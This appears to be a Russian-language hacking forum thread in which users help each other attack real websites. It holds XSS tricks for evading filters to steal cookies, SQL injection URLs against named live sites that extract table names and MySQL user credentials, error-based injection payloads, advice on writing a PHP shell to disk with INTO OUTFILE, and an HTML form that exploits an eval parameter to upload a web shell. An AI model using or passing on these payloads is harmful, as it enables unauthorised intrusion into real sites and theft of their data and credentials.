Как так, стоит фильтрация на слова script /script? бывает, что стоит фильтрация на "document.cookie". Тогда просто сделай d = document; и вставляй d.cookie; В общем попробуй обойти фильтрацию.
killerben, тег iframe подгружает страницу с удаленного сервера, и если ты подгрузишь там код, то это ничего не даст, он выполнится на удаленном сервере, а не на атакуемом, я тебе дал ссылку, внимательно почитай что там написано, и какие методы могут быть, вопросы отпадут сами собой!
есть сервачек с провами роот, через уязвимость скрипта не получается залить шелл так как фельтруются ковычки, вытянул логин и пасс от бд, прова роот, через пхпмиадмин не хочет с этими даными заходить, хотя удаленно по этим же данным подключается, знаю апсолютные пути к сайту и папкам с возможностью заливкой файла, на запрос select 'blabla' into outfile '/blabla/bla.php' ругается, в чем таробла, что делаю не так?!
такой вопрос есть таблица узерс http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+31,1--+ хочувывести от туда хотябы логины http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x7573657273+limit+12,1--+ ничего не выводит http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+ почему?
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5%20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit+0,1--+
ухты, спасибо, а можно поинтерисоватся, а lol.users интерисует вот ето lol. можете обяснить што ето откуда почиму и как?
Это база в которой находится данная таблица. Узнается так union select table_schema from information_schema.tables where table_name='users'
прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()
А разве папки /tmp/ не должно быть на сервере где стоит БД? И даже если так, сервер у них один, то ничего не меняется, прав может не быть на создание файла в директориях видные из веб, а то что в tmp пишется это понятно, т.к. права к этой папке у всех пользователей системы.
?id=181'+or+(select+count(*)+from+information_schema.tables+group+by+concat_ws(0x3a,(select+concat_ws(':',table_schema,table_name)+from+information_schema.tables+limit+0,1),floor(rand(0)*2)))--+ выдает- Subquery returns more than 1 row Где я намудрил?
видимо запрос select+concat_ws(':',table_schema,table_name)+from+information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1 и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.
Судя по всему да.. ?url=181'+or+(select+count(*)+from+information_schema.tables+group+by+concat_ws(0x3a,(select+concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1),floor(rand(0)*2)))--+ Выдал - Data too long for column '(null)' at row 15 Подскажите, почему так происходит?
где-то ты действительно намудрил Code: and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- вместо version() подставляешь уже (select table_name from information_schema.tables limit 0,1) У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw.Как определить кол-во полей?
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4MCB1bmlvbiBzZWxlY3QgdmVyc2lvbigpLS0= 1 поле в model_id
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть спс
Имеется код: Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo(); Нужен эксплоит который в code POST-методом будет пересылать код шелла.
если я правильно понял Code: <form action="http://site.ru/index.php?testKey=123&code=copy($_FILES[file][tmp_name],$_GET[bob]);&bob=/home/httpdocs/files/22.php" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="upload"> </form> </form> где /home/httpdocs/files/ - путь к папке которая доступна на запись